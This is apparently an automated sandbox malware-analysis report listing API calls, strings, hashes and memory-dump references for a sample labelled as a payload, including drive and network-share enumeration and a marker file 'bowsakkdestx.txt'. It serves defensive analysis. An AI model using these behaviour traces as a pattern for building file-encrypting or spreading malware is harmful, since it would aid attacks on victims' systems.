                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                            • API String ID: 3123740607-798102604
                                                                                                                            • Opcode ID: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction ID: 0b4f772ee93538a19ccd2b473515f8b46fe559c533960dc63fdf19f0a1aaaaa0
                                                                                                                            • Opcode Fuzzy Hash: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction Fuzzy Hash: 4511B671541E256BEB213B76AC05ABF7BDCFF427A4F10086AFE0596281F6359E0043E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fprintf_memset
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                            • API String ID: 3021507156-3399676524
                                                                                                                            • Opcode ID: c7d33753fda1f25bb4e1baa35efbca834d53d9e793a2b57c0c3adb884eea200e
                                                                                                                            • Instruction ID: 369716b1bf070bcdf10903e5072480642b3b08e19738a687f3b07712abc9855d
                                                                                                                            • Opcode Fuzzy Hash: c7d33753fda1f25bb4e1baa35efbca834d53d9e793a2b57c0c3adb884eea200e
                                                                                                                            • Instruction Fuzzy Hash: C8215B76A443113BE720A9275C02FBB7799DFC1B9CF04481EFE50672C6D625DD0642B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: cbcfc4bda323e745c456afee00f882580d6114fdb5cf63951838856d921a9a62
                                                                                                                            • Instruction ID: 45748298a9b2119e8af203546cdad32feeb125941ba6ea97c4375ee677fe02b2
                                                                                                                            • Opcode Fuzzy Hash: cbcfc4bda323e745c456afee00f882580d6114fdb5cf63951838856d921a9a62
                                                                                                                            • Instruction Fuzzy Hash: 43110AB2B4122833D930756A6C87FEF775C9F52B26F0004A7FE0CD2142B5AA995942E6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0047BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 0047BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00470C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00470C39
                                                                                                                            • _memset.LIBCMT ref: 00470C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00470C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A1726
                                                                                                                            • _strlen.LIBCMT ref: 004A1734
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • _strnlen.LIBCMT ref: 004A17BF
                                                                                                                            • __lock.LIBCMT ref: 004A17D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A17DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0049B70B
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _free.LIBCMT ref: 0049B71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047F0D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047E562
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FE03
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE21
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FE2B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE39
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FE44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$C7L
                                                                                                                            • API String ID: 2102423945-2563974722
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0046C687
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C4A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: bff5d982d0c2ba31b95ad6238f981bb060d7d121778bab6857154635bf944329
                                                                                                                            • Instruction ID: 891837c4c45fb25d3009a6b719b51d231dbfb811e202d2855a75126dde14ff06
                                                                                                                            • Opcode Fuzzy Hash: bff5d982d0c2ba31b95ad6238f981bb060d7d121778bab6857154635bf944329
                                                                                                                            • Instruction Fuzzy Hash: 9A01DB72A8022833D930B959AC47FFF775C9F62721F0004A7FE08D7141E5A5595A57D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$>V
                                                                                                                            • API String ID: 1693014935-1223471409
                                                                                                                            • Opcode ID: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction ID: f7618bcf917664d3832e6fc0dbcdd84621b0f39d4714757821935f35a0716d90
                                                                                                                            • Opcode Fuzzy Hash: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction Fuzzy Hash: 6DF0AFB0C042089BEB00DF90D9197DEBFB8BB08308F108559D4147A280D7BA1608CFE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0046C45B
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            • Opcode ID: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction ID: f5f7cf742fda9b06be482443fc52f988e44efe5d681e16bdd18528c6a0b9ad00
                                                                                                                            • Opcode Fuzzy Hash: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction Fuzzy Hash: D9E08675A4031C67EB30EBA0DC8AFE97B7CAF25B01F000492BB44D20C1E6B0E58D9B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: p2W
                                                                                                                            • API String ID: 2102423945-3016696164
                                                                                                                            • Opcode ID: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction ID: 816fc5adc046c836e003117ccb53362a93c6c62e7184d3277b519f31c51fdba7
                                                                                                                            • Opcode Fuzzy Hash: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction Fuzzy Hash: 4DF0393828874069F3106790BC0BB297E81A334F18F044048E60C2A2F3D7ED228CB3DE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF251
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF266
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                            • String ID: TeS$TeS
                                                                                                                            • API String ID: 757275642-3278968961
                                                                                                                            • Opcode ID: bd9df2dca23cd8331c8369d7c4efdcff06f165ada1cac66d8521344b723de5b5
                                                                                                                            • Instruction ID: 9b93e80207c89234d115c3431e76c89cfb3ebec580d4235197ab496171ba5b75
                                                                                                                            • Opcode Fuzzy Hash: bd9df2dca23cd8331c8369d7c4efdcff06f165ada1cac66d8521344b723de5b5
                                                                                                                            • Instruction Fuzzy Hash: 6FD06774D4020DBBCF04EFA5C589CCDBFB8AA04349F40856AAE1597241EA74A3498B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            • Opcode ID: 768958e1ad40911abcd4d278d7b9cf501cd27da42767c45129f46ac406272769
                                                                                                                            • Instruction ID: 259ec4e9878978abf560886af48a686491fe6584adac54ead6fde3604a87719f
                                                                                                                            • Opcode Fuzzy Hash: 768958e1ad40911abcd4d278d7b9cf501cd27da42767c45129f46ac406272769
                                                                                                                            • Instruction Fuzzy Hash: BC81CFB4900206EFEB14DF59C98079EBBF1FF14304F10492EE40657381E3BAAA54CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
                                                                                                                            • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                            • Instruction ID: 7398060686e13b2660a8def32edeb3b87e1c8b1daaabfdf85e30cfdfc4ed3a90
                                                                                                                            • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                            • Instruction Fuzzy Hash: D251D830A00605ABCB24AFA9CA4456F77B1AF01320F248FAFF835963D0D7B89D518B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0049C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0049C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0049C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: eebad9548548fa8fb14fc0a00ee59877e6a67020c1b72dc3c7b887970ec1e492
                                                                                                                            • Instruction ID: e7961784598594fc508076d8a1e50e96076bc2878b09f3bcbea49f19e27e69cc
                                                                                                                            • Opcode Fuzzy Hash: eebad9548548fa8fb14fc0a00ee59877e6a67020c1b72dc3c7b887970ec1e492
                                                                                                                            • Instruction Fuzzy Hash: 0031CE30600246AFDF219EA5CC84BAB7FA9BF41350F15847AE854872A0E734EC51DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0046F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0046F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0046F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0046F1A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            • Opcode ID: af161045fe083b8b3735f7ffdc0a76f1e219b343d12068cf875e4b1ca92937b8
                                                                                                                            • Instruction ID: e030ddfde6c482a8137554f480b67242852a31fb6a3f16ad448db17ff252fd5b
                                                                                                                            • Opcode Fuzzy Hash: af161045fe083b8b3735f7ffdc0a76f1e219b343d12068cf875e4b1ca92937b8
                                                                                                                            • Instruction Fuzzy Hash: 0F314535900104EBDB14AF68DC4ABEF7B78EF06704F10812AF815672C1E7796E49CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 005270AB
                                                                                                                              • Part of subcall function 005277A0: ___BuildCatchObjectHelper.LIBCMT ref: 005277D2
                                                                                                                              • Part of subcall function 005277A0: ___AdjustPointer.LIBCMT ref: 005277E9
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 005270C2
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 005270D4
                                                                                                                            • CallCatchBlock.LIBCMT ref: 005270F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901542994-0
                                                                                                                            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
